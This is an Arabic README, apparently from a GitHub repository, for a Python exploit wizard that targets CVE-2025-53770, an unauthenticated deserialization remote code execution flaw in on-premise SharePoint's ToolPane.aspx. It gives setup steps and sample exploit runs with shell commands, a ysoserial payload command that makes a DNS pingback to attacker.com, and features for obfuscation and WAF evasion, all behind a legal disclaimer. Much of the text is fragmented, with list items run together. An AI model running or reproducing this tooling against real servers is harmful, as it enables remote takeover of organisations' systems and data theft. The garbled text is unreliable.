
أداة استغلال متطورة موجهة بمعالج (Wizard) تستهدف CVE-2025-53770، وهي ثغرة حرجة (CVSS 9.8) لتنفيذ الأكواد عن بُعد (RCE) دون مصادقة في Microsoft SharePoint Server المحلي (2016 و2019 وSubscription Edition)
Divine Absolute هي أداة استغلال متطورة بلغة بايثون تعمل بمعالج تفاعلي (wizard) تستهدف CVE-2025-53770، وهي ثغرة حرجة (CVSS 9.8) تسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) دون مصادقة في Microsoft SharePoint Server المحلي (إصدارات 2016 و2019 وSubscription Edition). تم الكشف عن هذه الثغرة كيوم صفري في 19 يوليو 2025، وتنتج عن إلغاء تسلسل بيانات غير موثوقة في /_layouts/15/ToolPane.aspx. صُممت الأداة لاختبار الاختراق الأخلاقي والبحث الأمني المصرح به فقط، وتوفر دقةً وتخفيًا وقابلية تكيف لا مثيل لها للاستطلاع والاستغلال والتحقق.
المستودع: https://github.com/exfil0/CVE-2025-53770
⚠️ تحذير قانوني: هذه الأداة مخصصة للاستخدام القانوني والمصرح به فقط في بيئات خاضعة للسيطرة وبإذن صريح. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها غير قانوني وقد يؤدي إلى عواقب قانونية خطيرة. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.
ToolPane.aspx مع تسجيل نقاط متقدم وتعبيرات نمطية (مثل 16.0.0.\d+-\w+?).ToolPane.aspx مع تجاوزات قوية.WebRequest.Create, Dns.GetHostEntry).-enc)./xp.aspx أو قائمة على UUID).www.google.com)، عناوين URL مخصصة، أو مسارات SharePoint داخلية (مثل /_layouts/15/sharepoint.aspx).RequestException, ورموز/مسارات حالة قابلة للتخصيص.MicrosoftSharePointTeamServices), والمسارات (مثل /versions.aspx), والتعبيرات النمطية./_layouts/15/ToolPane.aspx./ToolPane.aspx, واستخدام قواعد WAF (مثل Cloudflare).pip install requests termcolor
pip install pythonnet
ysoserial.exe في مسار معروف (مثل ./ysoserial.exe).# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (via Homebrew)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe يمكن الوصول إليه أو وفّر مساره أثناء التنفيذ.شغّل المعالج التفاعلي:
python divine_absolute.py
Recon: يفحص وجود SharePoint والإصدار.Exploit: يرسل الحمولة إلى ToolPane.aspx.Full: استطلاع + استغلال (مع وضع عدواني اختياري).https://sharepoint.example.com).ObjectDataProvider) والأمر (مثل cmd /c whoami).http://attacker.com/callback أو sub.attacker.com).NONE أو BASIC_REFLECTION أو أو مقطعًا مخصصًا.python divine_absolute.py
# Select: Mode=Recon, Target=https://sharepoint.example.com
python divine_absolute.py
# Select: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# Select: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# Select: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
تُحفظ النتائج في xanthorox_results.json بالحقول التالية:
target: العنوان الذي تم اختباره.sharepoint_detected: قيمة منطقية (Boolean).toolpane_accessible: قيمة منطقية (Boolean).exploited: قيمة منطقية (تم إرسال الحمولة).verified_rce: قيمة منطقية/لا شيء (تم تأكيد RCE).error: أي أخطاء واجهتها.مثال:
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]
يصلح هذا الإصدار:
-enc)؛ ويدعم غير PowerShell (مثل cmd.exe) مع تحذيرات.pythonnet لإجراء pingback موثوق عبر DNS باستخدام Dns.GetHostEntry (تجريبي، ويتطلب gadget للحصول على التأثير الكامل).ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 وتحقق من سجلات DNS.Dns.GetHostEntry في pythonnet بدون سلسلة gadget محددة.المساهمات مرحب بها! يرجى:
git checkout -b feature/awesome-improvement).git commit -m "Add awesome improvement").git push origin feature/awesome-improvement).هذا المشروع مرخص بموجب رخصة MIT. راجع LICENSE للتفاصيل.
ملاحظة: تحقق دائمًا من الحمولات والإعدادات في مختبر مُتحكم به قبل الاستخدام. كن أخلاقيًا وملتزمًا بالقانون.
CONCAT_OBFUSCATEDNONE أو FIXED (مثل /xp.aspx) أو RANDOM (قائم على UUID).DEFAULT_SP أو NO_REFERER أو RANDOM_EXTERNAL أو CUSTOM_URL.http://127.0.0.1:8080)./sitepages/result.txt), والتعبيرات النمطية (مثل Xanthorox.*), ورموز الحالة (مثل 200,403), والمحاولات والتأخير والمهلة.